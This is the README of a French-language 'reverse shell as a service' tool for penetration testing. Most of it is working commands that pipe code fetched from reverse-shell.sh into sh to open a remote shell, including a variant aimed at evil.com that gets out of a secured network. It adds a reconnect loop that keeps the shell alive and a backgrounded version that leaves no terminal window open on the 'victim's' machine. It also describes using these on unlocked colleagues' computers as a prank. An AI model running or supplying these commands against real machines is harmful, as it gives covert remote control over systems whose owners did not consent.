
Service de reverse shell à la demande qui détecte automatiquement l'environnement cible et exécute la charge utile appropriée pour un accès distant lors de tests de pénétration.
Reverse Shell en tant que service - https://reverse-shell.sh
Reverse shell facile à retenir qui devrait fonctionner sur la plupart des systèmes de type Unix.
Détecte les logiciels disponibles sur la cible et exécute une charge utile appropriée.
Sur votre machine, ouvrez un port et écoutez dessus. Vous pouvez le faire facilement avec netcat.
nc -l 1337
Sur la machine cible, dirigez la sortie de https://reverse-shell.sh/votreip:port vers sh.
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
Retournez sur votre machine, vous devriez maintenant avoir une invite de shell.
Cet outil est destiné à être utilisé pour des tests d'intrusion ou pour aider les collègues à comprendre pourquoi ils devraient toujours verrouiller leurs ordinateurs. Veuillez ne pas l'utiliser à des fins malveillantes.
Vous pouvez utiliser un nom d'hôte au lieu d'une adresse IP.
curl https://reverse-shell.sh/localhost:1337 | sh
Étant donné qu'il s'agit d'une connexion inverse, elle peut traverser les pare-feux et se connecter à Internet.
Vous pouvez écouter les connexions sur un serveur à evil.com et obtenir un reverse shell depuis l'intérieur d'un réseau sécurisé avec :
curl https://reverse-shell.sh/evil.com:1337 | sh
Par défaut, lorsque le shell se ferme, vous perdez votre connexion. Cela peut arriver accidentellement avec une commande invalide. Vous pouvez facilement créer un shell qui tentera de se reconnecter en l'enveloppant dans une boucle while.
while true; do curl https://reverse-shell.sh/votreip:1337 | sh; done
Soyez prudent si vous faites cela à un collègue ; s'il quitte le bureau avec ceci encore en cours d'exécution, vous l'exposez à une attaque.
La session de terminal doit rester ouverte pour maintenir la connexion reverse shell. Cela pourrait être un peu révélateur si vous essayez de faire une blague à des collègues.
La commande suivante exécutera le reverse shell dans un processus d'arrière-plan et fermera le terminal, ne laissant aucune fenêtre de terminal suspecte ouverte sur la machine de la victime.
Assurez-vous d'exécuter cette commande dans une nouvelle fenêtre de terminal, sinon vous perdrez tout travail en cours dans votre session existante.
sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
MIT © Luke Childs